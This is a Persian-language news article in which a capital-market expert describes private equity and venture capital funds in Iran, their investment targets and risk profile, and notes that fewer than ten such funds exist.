یک کارشناس بازار سرمایه گفت: اگرچه تعداد صندوق‌های سرمایه‌گذاری خصوصی در مقایسه با طرح‌ها و پروژه‌های استارتاپ و نوآورانه کشور ناچیز است، اما روند رو به رشد حجم سرمایه‌گذاری‌ها به همراه افزایش قابل توجه شرکت‌های استارتاپی، نوید آینده‌ای درخشان را در این حوزه می‌دهد.

به گزارش روز دوشنبه پایگاه خبری پایگاه خبری بازار سرمایه ایران، «احسان عسکری» به صندوق‌های سرمایه‌گذاری خصوصی اشاره کرد و افزود: در دنیا صندوق‌های سرمایه‌گذاری خصوصی، اقدام به سرمایه‌گذاری در پروژه‌ها و تامین مالی شرکت‌هایی می کنند که تا حدی به مرحله بلوغ رسیده، ولی در بورس پذیرفته نشده‌اند. موضوع فعالیت این صندوق‌ها هم در بازارسرمایه کشور جمع‌آوری و تخصیص منابع مالی به سرمایه‌گذاری در سهام شرکت‌ها با موضوعات فعالیت مشخص است.

وی خاطرنشان کرد: این نوع سرمایه‌گذاری‌ها با هدف کنترل شرکت‌ها و هدایت سیاست‌های آن در راستای دستیابی به اهداف مد نظر و در نهایت خروج از آن شرکت‌هاست، همچنین این صندوق‌ها می‌توانند در شرکت‌های سهامی و غیرسهامی با موضوع فعالیت مشخص سرمایه‌گذاری کنند.

به گفته عسکری، شرکت‌های سهامی عام پذیرفته‌نشده در بازار سرمایه، شرکت‌های کوچک و متوسط (SME) پذیرش شده و شرکت‌هایی که از بورس اخراج شده‌اند از سوی این صندوق‌ها، قابل تامین مالی و سرمایه‌گذاری هستند.

این کارشناس بازار سرمایه توضیح داد: صندوق‌های خصوصی ابزاری برای تامین مالی پروژه ها و شرکت‌هایی است که به دنبال جذب مشارکت‌کننده هستند. همچنین صندوق‌های خصوصی در شرکت‌هایی که به بلوغ رسیده‌اند، ولی همچنان در بورس پذیرفته نشده‌اند، سرمایه‌گذاری می‌کنند.

وی خاطرنشان کرد: صندوق‌های جسورانه هم غالبا در شرکت‌های استارتاپی سرمایه‌گذاری می‌کنند که در مرحله شکل‌گیری یا بعد از آن قرار دارند و تا مرحله بلوغ کامل فاصله دارند.

عسکری در شباهت صندوق‌های سرمایه‌گذاری خصوصی با صندوق‌های جسورانه گفت: صندوق‌های سرمایه‌گذاری خصوصی به دلیل ماهیت موضوعات سرمایه‌گذاری و سطح ریسک در سرمایه‌گذاری‌ها شباهت زیادی با صندوق‌های سرمایه‌گذاری جسورانه (VC) دارند؛ بنابراین این صندوق‌ها به مثابه صندوق‌های VC مناسب افرادی است که پذیرش ریسک‌ بالاتری نسبت به بازار سهام برای کسب بازدهی بیشتر دارند.

این کارشناس بازار سرمایه ادامه داد: مزیت این سرمایه‌گذاری، امکان دست‌یابی به بازدهی فراتر از بازار سهام با پذیرش ریسک بالاتر است و برای اشخاصی که سطح ریسک پذیری بالایی دارند پیشنهاد می‌شود؛ بنابراین به افرادی که ریسک‌پذیری کمتری دارند، پیشنهاد می‌شود صندوق‌های سهام، مختلط و با درآمد ثابت را در سطوح پایین‌تر ریسک‌پذیری مدنظر قرار دهند.

وی عنوان کرد: در چند سال گذشته تلاش‌های زیادی از سوی نهادهای ناظر بازارسرمایه و سایر فعالان بازار به خصوص شرکت‌های سرمایه‌گذاری برای رونق بخشی در این حوزه صورت گرفته است و اکنون  با همه تلاش‌های صورت گرفته، تعداد صندوق‌های سرمایه‌گذاری خصوصی در بازارسرمایه کشور که با صندوق‌های جسورانه در یک طبقه قرار دارند، کمتر از ۱۰ صندوق است که عمده آن‌ها در دو تا سه سال گذشته راه‌اندازی شده‌اند.

عسکری افزود: این موضوع نشان می‌دهد اگرچه تعداد این صندوق‌ها در مقایسه با طرح‌ها و پروژه‌های استارتاپ و نوآورانه کشور ناچیز است، اما روند رو به رشد حجم سرمایه‌گذاری‌ها و افزایش تعداد این صندوق‌ها به همراه افزایش قابل توجه شرکت‌های استارتاپی، نوید آینده‌ای درخشان را در این حوزه می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران